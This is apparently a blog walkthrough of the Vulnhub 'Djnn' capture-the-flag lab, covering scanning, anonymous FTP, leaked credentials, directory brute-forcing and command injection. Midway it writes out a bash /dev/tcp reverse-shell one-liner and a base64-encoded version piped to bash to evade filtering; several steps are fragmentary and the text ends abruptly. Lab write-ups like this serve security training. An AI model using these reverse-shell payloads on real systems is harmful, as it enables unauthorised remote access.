Vulnhub Djnn Walkthrough

Scanning the host with nmap –A –T4 –p- –vv

Anonymous login is acceptable on ftp service port 21, so let’s try it

Username anonymous and password anonymous we can see there are 3 files we can download them one by one using GET command, all of them are text files.

File games.txt: oh and I forgot to tell you I’ve setup a game for you on port 1337. See if you can reach to the

final level and get the prize.

File message.txt: @nitish81299 I am going on holidays for few days, please take care of all the work.

And don’t mess up anything.

File creds.txt: nitu:81299

The game needs to be solved in order to give us a gift but after a 1000 tries, which we don’t have the time so lets move on with something else.

Lets start gobuster or dirsearch on port number 7331

Lets visit the directories we found and see if there is something interesting.

Simply just type id and whoami to get some information.

Now trying to get a shell using nc is not working, we have to encode the shell command as 64code ( googled it )  in order to pass it as understandable to the shell on the host:

bash -i >& /dev/tcp/ 0>&1  // this is the shell as we know it

now we encode it in base64:

echo “bash -i >& /dev/tcp/ 0>&” | base64

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTEvNDQzIDA+JjE=|base64 -d|bash  // this is encoded in 64code

a directory at “/home/nitish/.dev/” where a file named creds.txt

The second choice, no matter what number I guess it doesn’t work , so I looked at sam’s directory there is a file .pyc, download it on my machine to read it (python file) open it in python decompiler (online).

The answer is num

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s